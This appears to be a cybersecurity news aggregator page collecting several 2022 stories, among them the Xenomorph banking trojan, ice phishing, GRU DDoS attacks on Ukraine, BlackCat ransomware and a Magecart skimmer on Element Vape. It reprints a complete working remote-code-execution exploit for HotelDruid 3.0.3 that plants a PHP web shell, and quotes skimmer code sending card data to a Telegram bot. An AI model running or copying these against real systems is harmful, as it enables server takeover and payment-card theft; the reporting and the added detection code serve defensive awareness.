Monday, January 20, 2025

New Android malware dubbed Xenomorph targets customers of 56 banks


A new Android malware dubbed Xenomorph, served through the Google Play Store, has infected more than 50,000 Android devices to steal banking information.

Still in early development stage, Xenomorph is targeting users of dozens of financial institutions in Spain, Portugal, Italy, and Belgium.

Researchers at fraud and cybercrime prevention company ThreatFabric analyzing Xenomorph found code that is similar to Alien banking trojan. This suggests that the two threats are somehow connected: either Xenomorph is Alien’s successor or a developer has been working on both of them.

Banking trojans like Xenomorph aim to steal sensitive financial information, take over accounts, perform unauthorized transactions, and operators then sell the stolen data to interested buyers.

Sneaking into the Play Store

The Xenomorph malware entered the Google Play Store via generic performance-boosting applications such as “Fast Cleaner”, which has 50,000 installations.

Such utilities are a classic lure used by banking trojans, Alien included, because there’s always an interest in tools that promise to improve the performance of Android devices.

To evade rejection during Play Store review, Fast Cleaner fetches the payload only after installation, so the app is clean at submission time.

ThreatFabric recognized the application as a member of the “Gymdrop” dropper family, first discovered in November 2021, and observed pushing payloads that pose as Google Play, Chrome, or Bitcoin management apps.

Xenomorph capabilities

Xenomorph’s functionality is not full-blown at this point, as the trojan is under heavy development. However, it still represents a significant threat as it can fulfill its info-stealing purpose and it targets no less than 56 different European banks.

For example, the malware can intercept notifications, log SMS, and use injections to perform overlay attacks, so it can already snatch credentials and one-time passwords used to protect banking accounts.

After installation, the first action taken by the app is to send back a list of the packages installed on the infected device, so that the matching overlays can be loaded.

To achieve the above, the malware requests the granting of Accessibility Service permissions upon installation, and then abuses the privileges to grant itself additional permissions as needed.

Examples of commands present in the code but not yet implemented refer to keylogging functions and behavioral data collection.

Its Accessibility Engine is very detailed, and is designed with a modular approach in mind. It contains modules for each specific action required by the bot, and can be easily extended to support more functionalities. It would be unsurprising to see this bot sport semi-ATS capabilities in the very near future.

All in all, the malware may add next-level capabilities at any time, as only minor code implementations and modifications are required to activate extensive data siphoning functions.

ThreatFabric assesses that Xenomorph is not a strong threat at the moment due to its “under development” status. In time, though, it could reach its full potential, “comparable to other modern Android Banking trojans.”

To steer clear of Android malware that lurks in the Play Store, users should avoid installing apps that carry promises that are too good to be true. Checking other users’ reviews can sometimes help avoid malicious apps.


Stay informed of the latest Cybersecurity trends, threats and developments. Sign up for RiSec Weekly Cybersecurity Newsletter Today

Remember, CyberSecurity Starts With You!

  • Globally, 30,000 websites are hacked daily.
  • 64% of companies worldwide have experienced at least one form of a cyber attack.
  • There were 20M breached records in March 2021.
  • In 2020, ransomware cases grew by 150%.
  • Email is responsible for around 94% of all malware.
  • Every 39 seconds, there is a new attack somewhere on the web.
  • An average of around 24,000 malicious mobile apps are blocked daily on the internet.

Microsoft Warns of ‘Ice Phishing’ Threat on Web3 and Decentralized Networks


Microsoft has warned of emerging threats in the Web3 landscape, including “ice phishing” campaigns, as a surge in adoption of blockchain and DeFi technologies emphasizes the need to build security into the decentralized web while it’s still in its early stages.

The company’s Microsoft 365 Defender Research Team called out various new avenues through which malicious actors may attempt to trick cryptocurrency users into giving up their private cryptographic keys and carry out unauthorized fund transfers.

“One aspect that the immutable and public blockchain enables is complete transparency, so an attack can be observed and studied after it occurred,” Christian Seifert, principal research manager at Microsoft’s Security and Compliance group, said. “It also allows assessment of the financial impact of attacks, which is challenging in traditional web2 phishing attacks.”

The theft of the keys could be carried out in several ways, including impersonating wallet software, deploying malware on victims’ devices, typosquatting legitimate smart contract front ends, and minting rogue digital tokens for Airdrop scams.

Ice Phishing

Another technique involves what Microsoft calls “ice phishing.” Rather than stealing a user’s private keys, the method works by deceiving the target into “signing a transaction that delegates approval of the user’s tokens to the attacker.”

“Once the approval transaction has been signed, submitted, and mined, the spender can access the funds,” Seifert elaborated. “In case of an ‘ice phishing’ attack, the attacker can accumulate approvals over a period of time and then drain all [the] victim’s wallets quickly.”

One such instance of ice phishing came to light in early December 2021 with the high-profile hack of Ethereum-based DeFi platform BadgerDAO, wherein a maliciously injected snippet using a compromised API key enabled the adversary to siphon $121 million in funds.

“The attacker deployed the worker script via a compromised API key that was created without the knowledge or authorization of Badger engineers,” BadgerDAO said. “The attacker(s) used this API access to periodically inject malicious code into the Badger application such that it only affected a subset of the user base.”

The script was programmed such that it would intercept Web3 transactions from wallets over a certain balance and insert a request to transfer the victim’s tokens to an address chosen by the attackers.

To mitigate threats affecting blockchain technology, Microsoft recommends that users review and audit smart contracts for adequate incident response or emergency capabilities, and periodically reassess and revoke token allowances.
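The approval mechanism that ice phishing abuses, and the allowance review Microsoft recommends, as an added example that is not Microsoft’s or BadgerDAO’s code: it ABI-encodes the standard ERC-20 allowance() query and the approve(spender, 0) revocation, and replays a constructed list of Approval events to flag allowances a wallet owner should revisit. The addresses, events and trusted-spender list are constructed; only the two function selectors are real ERC-20 values.

```python
"""Audit ERC-20 token allowances and build revocation calldata (added example).

Works offline on a constructed list of Approval events; in practice the same
(token, owner, spender, value) data comes from a node's event logs, or from an
eth_call carrying the allowance() calldata built here.
"""
from dataclasses import dataclass

# Standard ERC-20 selectors: first 4 bytes of keccak256 of the signature.
SEL_ALLOWANCE = bytes.fromhex("dd62ed3e")   # allowance(address,address)
SEL_APPROVE = bytes.fromhex("095ea7b3")     # approve(address,uint256)
UINT256_MAX = (1 << 256) - 1                # the usual "unlimited" approval


def _addr_word(addr: str) -> bytes:
    """ABI-encode a 20-byte hex address as a left-padded 32-byte word."""
    raw = bytes.fromhex(addr[2:] if addr.startswith("0x") else addr)
    if len(raw) != 20:
        raise ValueError(f"bad address: {addr}")
    return raw.rjust(32, b"\x00")


def encode_allowance_call(owner: str, spender: str) -> str:
    """Calldata for allowance(owner, spender), usable as the data of an eth_call."""
    return "0x" + (SEL_ALLOWANCE + _addr_word(owner) + _addr_word(spender)).hex()


def encode_revoke(spender: str) -> str:
    """Calldata for approve(spender, 0): the revocation the article recommends."""
    return "0x" + (SEL_APPROVE + _addr_word(spender) + (0).to_bytes(32, "big")).hex()


def decode_uint256(ret_hex: str) -> int:
    """Decode the single 32-byte word that allowance() returns."""
    raw = bytes.fromhex(ret_hex[2:] if ret_hex.startswith("0x") else ret_hex)
    if len(raw) != 32:
        raise ValueError("allowance() must return exactly one 32-byte word")
    return int.from_bytes(raw, "big")


@dataclass
class Approval:
    """One ERC-20 Approval(owner, spender, value) event, as emitted by `token`."""
    token: str
    owner: str
    spender: str
    value: int


def audit_allowances(events, trusted_spenders):
    """Replay Approval events in order: the last value per (token, spender) is the
    live allowance. Flag non-zero allowances to spenders outside the trusted set
    and unlimited allowances even to trusted ones, with ready-made revoke calldata."""
    live = {}
    for ev in events:
        live[(ev.token, ev.spender.lower())] = ev.value
    trusted = {s.lower() for s in trusted_spenders}
    findings = []
    for (token, spender), value in live.items():
        if value == 0:
            continue
        if spender not in trusted:
            reason = "unknown spender"
        elif value == UINT256_MAX:
            reason = "unlimited allowance"
        else:
            continue
        findings.append({"token": token, "spender": spender, "value": value,
                         "reason": reason, "revoke_calldata": encode_revoke(spender)})
    return findings


# Constructed sample data (not real addresses or events).
TOKEN = "0x" + "aa" * 20      # token contract
OWNER = "0x" + "11" * 20      # the victim's wallet
DEX = "0x" + "22" * 20        # a spender the owner knowingly uses
DRAINER = "0x" + "33" * 20    # the spender an ice-phishing transaction approved

SAMPLE_EVENTS = [
    Approval(TOKEN, OWNER, DEX, 10**18),           # bounded, intended approval
    Approval(TOKEN, OWNER, DRAINER, UINT256_MAX),  # the phished approval
    Approval(TOKEN, OWNER, DEX, 0),                # owner later revoked the DEX
]

if __name__ == "__main__":
    print("query:", encode_allowance_call(OWNER, DRAINER))
    for f in audit_allowances(SAMPLE_EVENTS, [DEX]):
        print(f"{f['reason']}: spender {f['spender']} -> revoke with {f['revoke_calldata']}")
```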


U.S. Cybersecurity Agency, CISA, Publishes List of Free Security Tools and Services


The U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Friday published a repository of free tools and services to enable organizations to mitigate, detect, and respond effectively to malicious attacks and further improve their security posture.

The “Free Cybersecurity Services and Tools” resource hub comprises a mix of services provided by CISA, open-source utilities, and other implements offered by private and public sector organizations across the cybersecurity community.

“Many organizations, both public and private, are target rich and resource poor,” CISA Director, Jen Easterly, said in a statement. “The resources on this list will help such organizations improve their security posture, which is particularly critical in the current heightened threat environment.”

The tools catalog is the latest in a string of initiatives launched by CISA to combat cyber threats and help organizations adopt foundational measures to maximize resilience by patching security flaws in software, enforcing multi-factor authentication, and halting bad practices.

To that end, the agency has launched dedicated portals documenting Known Exploited Vulnerabilities, “exceptionally risky” cybersecurity procedures, guidance for resisting ransomware infections as well as threats associated with nefarious information and influence operations.

Earlier this week, it also launched a “Shields Up” campaign notifying organizations in the U.S. of potential risks arising from cyber threats that can disrupt access to essential services and potentially result in impacts to public safety.

The development also comes as the agency released an alert detailing proactive steps that critical infrastructure entities can take to assess and mitigate threats related to information manipulation, while noting that the advancements in communications and networked systems have created new vectors for exploitation.

“Malicious actors may use tactics — such as misinformation, disinformation, and malinformation — to shape public opinion, undermine trust, and amplify division, which can lead to impacts to critical functions and services across multiple sectors,” CISA said.


White House and UK Gov attribute DDoS attacks on Ukraine to Russia’s GRU


The White House has linked the recent DDoS attacks against Ukraine’s banks and defense agencies to Russia’s GRU.

The White House has linked the recent DDoS attacks that took offline the sites of banks and defense agencies of Ukraine to Russia’s Main Directorate of the General Staff of the Armed Forces (aka GRU).

This week, the Ministry of Defense and the Armed Forces of Ukraine and state-owned banks, Privatbank (Ukraine’s largest bank) and Oschadbank were hit by Distributed Denial-of-Service (DDoS) attacks. The website of the Ukrainian Ministry of Defense has been taken down by the wave of DDoS attacks.

“The US government believes that Russian cyber actors likely have targeted the Ukrainian government, including military and critical infrastructure networks, to collect intelligence and preposition to conduct disruptive cyber activities,” said Anne Neuberger, the Biden administration’s deputy national security adviser for cyber and emerging technologies.

“We have technical information that links the Russian main intelligence directorate, or GRU, as known GRU infrastructure was seen transmitting high volumes of communication to Ukraine-based IP addresses and domains.”

Neuberger pointed out that the attacks are part of a broad strategy that aims at assisting destructive attacks in preparation for a military attack and consequent invasion.

“Russia likes to move in the shadows and counts on a long process of attribution. In light of that, we’re moving quickly to attribute the DDoS attacks,” Neuberger added.

“We do expect that should Russia decide to proceed with a further invasion of Ukraine, we may see further destabilizing or destructive cyber activity, and we’ve been working closely with allies and partners to ensure we’re prepared to call out that behavior and respond,” said Neuberger. “The global community must be prepared to shine a light on malicious cyber activity and hold actors accountable for any and all disruptive or destructive cyber activity.”

“And, as the President said earlier this week, if Russia attacks the United States or allies through asymmetric activities like disruptive cyberattacks against our companies or critical infrastructure, we are prepared to respond,” Neuberger continued.

The UK government also linked the DDoS attacks to Russia’s GRU.

“The UK Government judges that the Russian Main Intelligence Directorate (GRU) were involved in this week’s distributed denial of service attacks against the financial sector in Ukraine,” a Foreign, Commonwealth & Development Office spokesperson said. “The attack showed a continued disregard for Ukrainian sovereignty. This activity is yet another example of Russia’s aggressive acts against Ukraine.”

Ukraine’s SBU intelligence agency also attributed the DDoS attacks to Russia, while Moscow denied the accusations.

The Security Service of Ukraine (SSU) today revealed the country is the target of an ongoing “wave of hybrid warfare” conducted by Russia-linked malicious actors. The threat actors aim to destabilize the social situation in the country and to instill fear and distrust in the country’s government.

The SSU said the campaign is linked to Russian intelligence agencies that are spreading disinformation through social networks and other media.


HotelDruid RCE (Remote Code Execution) V3.0.3


What Is Hotel Druid

HotelDruid is an open-source program for hotel management (property management software) developed by DigitalDruid.Net.

Vendor URL: hoteldruid.com

CVSS rating: 8.8/10

HotelDruid RCE PoC

# Exploit Title: Hotel Druid 3.0.3 - Remote Code Execution (RCE)

# Exploit Author: 0z09e (https://twitter.com/0z09e)
# Vendor Homepage: https://www.hoteldruid.com/
# Software Link: https://www.hoteldruid.com/download/hoteldruid_3.0.3.tar.gz
# Version: 3.0.3
# CVE : CVE-2022-22909

#!/usr/bin/python3
import requests
import argparse

def login( target , username = "" , password = "", noauth=False):
	login_data = {
				"vers_hinc" : "1",
				"nome_utente_phpr" : username,
				"password_phpr" : password
				} 
	if not noauth:
		login_req = requests.post(f"{target}/inizio.php" , data=login_data , verify=False )
		if '<a class="nav" id="nb_men" href="./inizio.php?id_sessione=' in login_req.text:
			token = login_req.text.split('<a class="nav" id="nb_men" href="./inizio.php?id_sessione=')[1].split('">&nbsp;<b>')[0]
			anno = login_req.text.split('<input type="hidden" name="anno" value="')[1].split('">')[0]
			ret_data = {"token" : token , "anno" : anno}
			#print("ret data" + ret_data)
			return ret_data
		else:
			return False
	else:
		login_req = requests.get(f"{target}/inizio.php" , verify=False )
		try:
			anno = login_req.text.split('<input type="hidden" name="anno" value="')[1].split('">')[0]
			token = ""
			ret_data = {"token" : token , "anno" : anno}
			return ret_data
		except:
			return False

def check_privilege(target , anno , token=""):
	priv_req = requests.get(f"{target}/visualizza_tabelle.php?id_sessione={token}&tipo_tabella=appartamenti" , verify=False)
	#print(priv_req.text)
	if "Modify" in priv_req.text:
		return True
	else:
		return False

def add_room(target , anno , token=""):
	add_room_data = { 
				"anno": anno,
				"id_sessione": token,
				"n_app":"{${system($_REQUEST['cmd'])}}",
				"crea_app":"SI",
				"crea_letti":"",
				"n_letti":"",
				"tipo_tabella":"appartamenti"
				}
	add_req = requests.post(f"{target}/visualizza_tabelle.php" , data=add_room_data , verify=False)
	#print(add_req.text)
	if "has been added" in add_req.text:
		return True
	else:
		return False
def test_code_execution(target):
	code_execution_req = requests.get(f"{target}/dati/selectappartamenti.php?cmd=id")
	if "uid=" in code_execution_req.text:
		return code_execution_req.text.split("\n")[0]
	else:
		return False


def main():

	banner = """\n /$$   /$$             /$$               /$$       /$$$$$$$                      /$$       /$$
| $$  | $$            | $$              | $$      | $$__  $$                    |__/      | $$
| $$  | $$  /$$$$$$  /$$$$$$    /$$$$$$ | $$      | $$  \ $$  /$$$$$$  /$$   /$$ /$$  /$$$$$$$
| $$$$$$$$ /$$__  $$|_  $$_/   /$$__  $$| $$      | $$  | $$ /$$__  $$| $$  | $$| $$ /$$__  $$
| $$__  $$| $$  \ $$  | $$    | $$$$$$$$| $$      | $$  | $$| $$  \__/| $$  | $$| $$| $$  | $$
| $$  | $$| $$  | $$  | $$ /$$| $$_____/| $$      | $$  | $$| $$      | $$  | $$| $$| $$  | $$
| $$  | $$|  $$$$$$/  |  $$$$/|  $$$$$$$| $$      | $$$$$$$/| $$      |  $$$$$$/| $$|  $$$$$$$
|__/  |__/ \______/    \___/   \_______/|__/      |_______/ |__/       \______/ |__/ \_______/\n\nExploit By - 0z09e (https://twitter.com/0z09e)\n\n"""
	

	parser = argparse.ArgumentParser()
	req_args = parser.add_argument_group('required arguments')
	req_args.add_argument("-t" ,"--target" , help="Target URL. Example : http://10.20.30.40/path/to/hoteldruid" , required=True)
	req_args.add_argument("-u" , "--username" , help="Username" , required=False)
	req_args.add_argument("-p" , "--password" , help="password", required=False)
	req_args.add_argument("--noauth" , action="store_true" , default=False , help="If No authentication is required to access the dashboard", required=False)
	args = parser.parse_args()                                                                         

	target = args.target
	if target[-1] == "/":
		target = target[:-1]
	noauth = args.noauth

	username = args.username
	password = args.password

	if noauth == False and (username == None or password == None):
		print('[-] Please provide the authentication method.' )
		quit()

	print(banner)
	if not noauth:
		print(f"[*] Logging in with the credential {username}:{password}")
		login_result = login(username = username , password = password , target = target)
		if login_result != False:
			token = login_result.get('token')
			anno = login_result.get('anno')
		else:
			print("[-] Login failed, Check your credential or check if login is required or not .")
			quit()
	else:
		print('[*] Trying to access the Dashboard.')
		login_result = login(username = username , password = password , target = target , noauth=True)
		if login_result != False:
			token = login_result.get('token')
			anno = login_result.get('anno') 
		else:
			print('[-] Unable to access the dashboard, Maybe the dashboard is protected with credential.')
			exit()
	print("[*] Checking the privilege of the user.")
	if check_privilege(target= target , token=token , anno=anno):
		print("[+] User has the privilege to add room.")
	else:
		print("[-] User doesn't have the privilege to add room.")
		exit()
	print("[*] Adding a new room.")
	if add_room(target = target , anno=anno , token=token):
		print('[+] Room has been added successfully.')
	else:
		print('[-] Unknown error occured, unable to add room. Maybe the room has already been added')
		exit()
	print('[*] Testing code exection')
	output = test_code_execution(target = target)
	if output != False:
		print(f"[+] Code executed successfully, Go to {target}/dati/selectappartamenti.php and execute the code with the parameter 'cmd'.")
		print(f'[+] Example : {target}/dati/selectappartamenti.php?cmd=id')
		print(f"[+] Example Output : {output}")
		exit()
	else:
		print(f"[-] Code execution failed. If the Target is Windows, Check {target}/dati/selectappartamenti.php and try execute the code with the parameter 'cmd'. Example : {target}/dati/selectappartamenti.php?cmd=hostname")
		exit()
main()


ElementVape: Major e-cigarette store hacked to steal credit cards


A prominent online seller of e-cigarettes and vaping kits is serving a credit card skimmer on its live site, likely after getting hacked.

With its presence across the U.S. and Canada, Element Vape sells e-cigarettes, vaping devices, e-liquids, and CBD products in both retail outlets and on their online store.

Vaping site pulls in JavaScript to skim credit cards

Element Vape’s website is loading a malicious JavaScript file from a third-party website that appears to contain a credit card stealer.

Threat actors employing such credit card stealers on eCommerce stores by injecting scripts are referred to as Magecart.

Multiple webpages of the store, starting with the homepage, contain an obscure base64-encoded script that can be seen on lines 45-50 of the HTML source code shown below:

Malicious JS loaded by ElementVape.com (BleepingComputer)

It isn’t known exactly how long the malicious script has been present on ElementVape.com.

Our analysis of ElementVape.com on Wayback Machine indicates the above code was absent as of February 5th 2022 and before. Therefore, the infection appears to be more recent, occurring sometime after the date and before getting discovered today.

When decoded, these six lines are simply pulling in the following JavaScript file, hosted on a third-party site:

//weicowire[.]com/js/jquery/frontend.js

The heavily obfuscated malicious payload resides in this frontend.js file towards the end:

Script exfiltrates payment data via Telegram

The above script, when decoded and analyzed by BleepingComputer, was seen collecting customers’ payment card and billing information on checkout.

Some of the fields that the script looks for include: email address, payment card number/expiration date, phone number, billing address including street and ZIP code.

This information is then exfiltrated to the attacker via an obfuscated, hardcoded Telegram address present in the script:

var x = new XMLHttpRequest();
x.open("POST", "https://api.telegram.org/bot" + tbot + "/sendMessage", true);
x.setRequestHeader('Content-Type', 'application/json; charset=utf-8');
x.withCredentials = false;
var dd = JSON.stringify({
    chat_id: tchat,
    text: tmessage
});
x.send(dd);

Further, the script contains anti-reverse-engineering features that check if it is being run in a sandbox environment or “devtools” to deter analysis.
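Detection logic for the two indicators described above, a base64-wrapped loader that pulls in a third-party script and an exfiltration call to the Telegram Bot API, as an added example that is not BleepingComputer’s or Element Vape’s code. The first-party allow-list, the sample HTML and the sample JavaScript are constructed to resemble the described infection, and the third-party domain in them is a placeholder, not the one named above.

```python
"""Scan page HTML and external JS for Magecart-style indicators (added example).

Two checks mirror the article: (1) a base64 blob inside an inline <script>
that decodes to a loader pointing at a domain outside the store's own, and
(2) JavaScript that talks to https://api.telegram.org/bot<token>/sendMessage.
"""
import base64
import re
from urllib.parse import urlparse

# Assumed allow-list of first-party script hosts (constructed for this example).
FIRST_PARTY = {"elementvape.com", "www.elementvape.com"}

SCRIPT_RE = re.compile(r"<script\b([^>]*)>(.*?)</script>", re.I | re.S)
SRC_RE = re.compile(r"""\bsrc\s*=\s*["']([^"']+)["']""", re.I)
B64_RE = re.compile(r"[A-Za-z0-9+/]{24,}={0,2}")           # long base64-looking runs
URL_RE = re.compile(r"(?:https?:)?//[A-Za-z0-9.-]+\.[A-Za-z]{2,}(?:/[^\s'\"<>]*)?")
TELEGRAM_RE = re.compile(r"api\.telegram\.org/bot", re.I)   # Bot API exfil endpoint


def _host(url: str) -> str:
    """Hostname of an absolute or protocol-relative URL ('' if none)."""
    return urlparse(url if "//" in url else "//" + url).hostname or ""


def decode_b64_blobs(text: str):
    """Return (blob, decoded_text) for base64 runs that decode to readable text."""
    out = []
    for m in B64_RE.finditer(text):
        blob = m.group(0)
        try:
            dec = base64.b64decode(blob, validate=True).decode("utf-8")
        except (ValueError, UnicodeDecodeError):   # binascii.Error is a ValueError
            continue
        if all(c.isprintable() or c in "\r\n\t" for c in dec):
            out.append((blob, dec))
    return out


def scan_script_body(body: str):
    """Indicators inside one script body: hidden third-party URLs, Telegram exfil."""
    findings = []
    for _blob, dec in decode_b64_blobs(body):
        for url in URL_RE.findall(dec):
            if _host(url) not in FIRST_PARTY:
                findings.append(("b64-hidden-loader", url))
    m = TELEGRAM_RE.search(body)
    if m:
        findings.append(("telegram-exfil", m.group(0)))
    return findings


def scan_html(html: str):
    """Walk every <script> tag: flag third-party src attributes and body indicators."""
    findings = []
    for attrs, body in SCRIPT_RE.findall(html):
        src = SRC_RE.search(attrs)
        if src and _host(src.group(1)) not in FIRST_PARTY:
            findings.append(("third-party-script", src.group(1)))
        findings.extend(scan_script_body(body))
    return findings


def scan_js(js: str):
    """Same body checks applied to a fetched external file such as frontend.js."""
    return scan_script_body(js)


# Constructed samples: a loader hidden in base64 in the page, and a skimmer's exfil call.
LOADER_JS = ("var s=document.createElement('script');"
             "s.src='//cdn-third-party.example/js/jquery/frontend.js';"
             "document.head.appendChild(s);")
SAMPLE_HTML = ('<html><head>\n'
               '<script src="https://www.elementvape.com/static/app.js"></script>\n'
               '<script>eval(atob("' + base64.b64encode(LOADER_JS.encode()).decode()
               + '"));</script>\n</head><body></body></html>')
SAMPLE_JS = ('var tbot="<bot-token-placeholder>",tchat="<chat-id-placeholder>";\n'
             'var x=new XMLHttpRequest();'
             'x.open("POST","https://api.telegram.org/bot"+tbot+"/sendMessage",true);'
             'x.send(JSON.stringify({chat_id:tchat,text:tmessage}));')

if __name__ == "__main__":
    for kind, detail in scan_html(SAMPLE_HTML) + scan_js(SAMPLE_JS):
        print(f"[!] {kind}: {detail}")
```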

Large but obscure e-cig retailer

It isn’t clear how ElementVape.com’s backend code was maliciously modified in the first place to sneak in the malicious script.

And, this is not the first time Element Vape has been compromised either.

In 2018, Element Vape customers reported receiving letters from the company stating that a data breach had occurred and the “window of intrusion between Dec 6, 2017 and June 27, 2018” potentially exposed customers’ personal information to threat actors. Element Vape confirmed the claims via what appears to be the company’s Reddit account.

Following this event, Illinois-based consumer Artur Tyksinski sued Element Vape alleging that the vaping retailer “failed to timely notify affected individuals of the data breach” and didn’t have adequate procedures in place to prevent unauthorized access to customers’ confidential information. This was followed by a class-action lawsuit in 2019, demanding a trial by jury.

Despite supposedly being “one of the world’s largest online Vape retailers” of e-cigarettes across retail stores and online, not much is readily known about Element Vape.

Known as TheSY LLC in some states, Element Vape’s Twitter account shows a following of more than 13,000 users.

But, oddly enough, their tweets are protected, making it harder to interact with the retailer.

Element Vape’s tweets are protected (Twitter)

The company, according to its website, is based in California and has been in operation since 2013.

“Our personal philosophy is to give consumers more than what they pay for. With an uncompromising drive to exceed expectations, we are committed to help [sic] customers experience the best possible shopping experience,” states Element Vape’s website.

Last year, the company partnered with PUDO (Picking Up or Dropping Off) Inc. to make its e-cigarettes and vaping goods available for “pick-up” across Canada’s PUDOpoint Counters.

BleepingComputer has notified Element Vape of the issue via its Zendesk support site, which at the time of our analysis, did not appear to contain the malicious script.

Since users may be actively shopping on the store, we believe it’s in the public interest to share details about this ongoing attack and prevent customers from getting their financial info stolen.

If you have recently made any purchases on the website, make sure to check your credit card transactions for any suspicious activity. Additionally, it’s worth sharing this article with those you know who vape.


UK: Confidential patient data breached by ESNEFT staff


Cases of snooping on confidential patient data at the trust which runs Colchester Hospital are among the highest in the country, figures reveal.

East Suffolk and North Essex Foundation Trust reported the country’s second-highest figure when it came to staff breaching patient privacy.

The Daily Mail revealed today that the incidents involved nosy employees looking up the medical records of friends, family, colleagues and neighbours.

It said that in total, 19 staff at the trust, which also runs hospitals in Ipswich, Clacton and Harwich, were disciplined between 2017 and 2018 for misuse of patient records.

Dr Martin Mansfield, Caldicott Guardian at the trust, said: “Patient confidentiality is a priority, and we have a number of policies in place to make sure we are safeguarding all our patients’ data and information.

“We take any patient data breach seriously, investigate thoroughly, and take action where needed.”

A Caldicott Guardian is a senior person responsible for protecting the confidentiality of people’s health and care information and making sure it is used properly.

Only 73 per cent – 158 of 215 – of the hospital trusts contacted responded to the Daily Mail’s Freedom of Information query.


GitHub code scanning now finds more security vulnerabilities


Code hosting platform GitHub today launched new machine learning-based code scanning analysis features that will automatically discover more common security vulnerabilities before they end up in production. 

These new experimental static analysis features are now available for JavaScript and TypeScript GitHub repositories in public beta.

GitHub Code Scanning Analysis

“With the new analysis capabilities, code scanning can surface even more alerts for four common vulnerability patterns: cross-site scripting (XSS), path injection, NoSQL injection, and SQL injection,” said GitHub’s Tiferet Gazit and Alona Hlobina.

“Together, these four vulnerability types account for many of the recent vulnerabilities (CVEs) in the JavaScript/TypeScript ecosystem, and improving code scanning’s ability to detect such vulnerabilities early in the development process is key in helping developers write more secure code.”

Security vulnerabilities discovered by the new experimental code analysis features will show up as alerts in the ‘Security’ tab of enrolled repositories. 

These new alerts are marked using an ‘Experimental’ label and will also be available via the pull requests tab.

Experimental code scanning alerts (GitHub)

The CodeQL code analysis engine, which powers GitHub’s code scanning, was added to the platform’s capabilities after GitHub acquired code-analysis platform Semmle in September 2019.

GitHub released the first code scanning beta at GitHub Satellite in May 2020 and announced its general availability four months later, in September 2020.

During beta testing, the code scanning feature was used to scan more than 12,000 repositories 1.4 million times and found over 20,000 security issues, including remote code execution (RCE), SQL injection, and cross-site scripting (XSS) flaws.

GitHub Code scanning is free for public repositories and is available as a GitHub Advanced Security feature for GitHub Enterprise private repositories.

To configure code analysis for your JavaScript/TypeScript code, follow GitHub’s setup instructions for code scanning. The new features are available for code scanning’s security-extended and security-and-quality analysis suites, not in the default suite.
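As an added example of that configuration step (a workflow written here, not taken from GitHub’s documentation), the following GitHub Actions workflow runs CodeQL on a JavaScript/TypeScript repository with the security-extended suite selected. The branch name and action version tags are assumptions; adjust them to the repository.

```yaml
# Added example, not GitHub's own workflow template: CodeQL code scanning with
# the security-extended query suite, which is one of the two suites that
# carry the experimental JavaScript/TypeScript queries.
name: CodeQL

on:
  push:
    branches: [main]        # assumed default branch
  pull_request:
    branches: [main]

jobs:
  analyze:
    runs-on: ubuntu-latest
    permissions:
      contents: read
      security-events: write  # needed to upload alerts to the Security tab

    steps:
      - uses: actions/checkout@v3

      - uses: github/codeql-action/init@v2
        with:
          languages: javascript        # covers TypeScript as well
          queries: security-extended   # or security-and-quality

      - uses: github/codeql-action/analyze@v2
```

With the suite selected, alerts from the experimental queries appear alongside the standard CodeQL results, labelled ‘Experimental’ so that reviewers can weigh them against the higher false-positive rate the article notes below.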

“It’s important to note that while we continue to improve and test our machine learning models, this new experimental analysis can have a higher false-positive rate relative to results from our standard CodeQL analysis,” Gazit and Hlobina added.

“As with most machine learning models, the results will improve over time.”

You may also enjoy reading, CVEs You May Have Missed While Log4J Stole The Headlines

source

Go to Cybersecurity News

Go to Homepage

Go to Cybersecurity Academy

Stay informed of the latest Cybersecurity trends, threats and developments. Sign up for RiSec Weekly Cybersecurity Newsletter Today

Remember, CyberSecurity Starts With You!

  • Globally, 30,000 websites are hacked daily.
  • 64% of companies worldwide have experienced at least one form of a cyber attack.
  • There were 20M breached records in March 2021.
  • In 2020, ransomware cases grew by 150%.
  • Email is responsible for around 94% of all malware.
  • Every 39 seconds, there is a new attack somewhere on the web.
  • An average of around 24,000 malicious mobile apps are blocked daily on the internet.

Beware of the BlackCat ransomware: dangerous and on the prowl


In February 2022, Swissport was hit by a ransomware attack that led to flight delays and service disruption. The BlackCat ransomware group has now claimed responsibility for the attack and says it stole data including images of passports, internal business memos, and personal information of job candidates.

Dubbed by some security analysts to be the “most sophisticated” ransomware group of 2021, BlackCat ransomware has already become quite infamous within the cybersecurity community. Earlier in February, some of its members confirmed the group was linked to the notorious BlackMatter operation. After this attack, it is likely the group will continue to strike, aiming for larger corporations or even government organizations.

Commenting on the activities of this group for Digital Journal is JP Perez-Etchegoyen, CTO at Onapsis. Perez-Etchegoyen outlines some of the possible methods of future attacks.

Perez-Etchegoyen considers the nature and complexity of the recent attack: “This attack further confirms that BlackCat ransomware is a highly sophisticated threat group that has become increasingly dangerous. Now with access to sensitive data like passport numbers, full names, and emails, it’s highly likely that BlackCat will be conducting additional malicious activities for monetary gain.”

Perez-Etchegoyen adds that one reason why the attacks are successful is based on the detailed knowledge that the group members possess about business information technology. According to the analyst: “Recent research shows that BlackCat ransomware incorporates knowledge about SAP business applications to properly function. This is of particular concern, as business-critical applications, like those from SAP, contain vital data (financial, customer, product, employee, etc.) that keep enterprises running.”

Whilst these applications have transformed the way businesses operate, they can also introduce unnecessary risk if not properly managed and secured. Here Perez-Etchegoyen points out an additional vulnerability connected to updating SAP and other important systems: “Organizations are not purposeful when it comes to securing these applications, opening significant security gaps. This makes threats like ransomware far more dangerous, as attackers often seek to exploit unpatched business-critical applications to steal valuable data.”

There are different measures that can be adopted, and Perez-Etchegoyen presents these as: “To protect their mission-critical applications and their business from sophisticated ransomware groups like BlackCat, it’s crucial for enterprises to assess all systems in their SAP landscape for any cyber threats, including missing patches, broad authorizations, insecure integrations or misconfigurations, and immediately apply all relevant mitigations.” Lastly, Perez-Etchegoyen recommends: “Furthermore, they must incorporate a business-critical application security program into their overall cybersecurity strategy to ensure these applications are effectively and comprehensively protected.”

What is Ransomware & How Does It Work?


US challenges Russia to step back from Ukraine attack


The United States said Thursday that Russia is on the verge of unleashing a massive military attack against Ukraine, dismissing  Moscow’s claim to be pulling forces back, as artillery fire hit a Ukrainian kindergarten.

In a dramatic, previously unscheduled speech to the United Nations in New York, US Secretary of State Antony Blinken said intelligence showed Moscow could order an assault on its neighbor in the “coming days.”

Russian forces are taking part in joint military exercises with the military in Ukraine’s neighbour Belarus – Copyright AFP CARL DE SOUZA

With US and other Western governments saying they see no evidence to support Russia’s claim to be withdrawing, Blinken challenged the Kremlin to “announce today with no qualification, equivocation or deflection that Russia will not invade Ukraine. State it clearly. State it plainly to the world.”

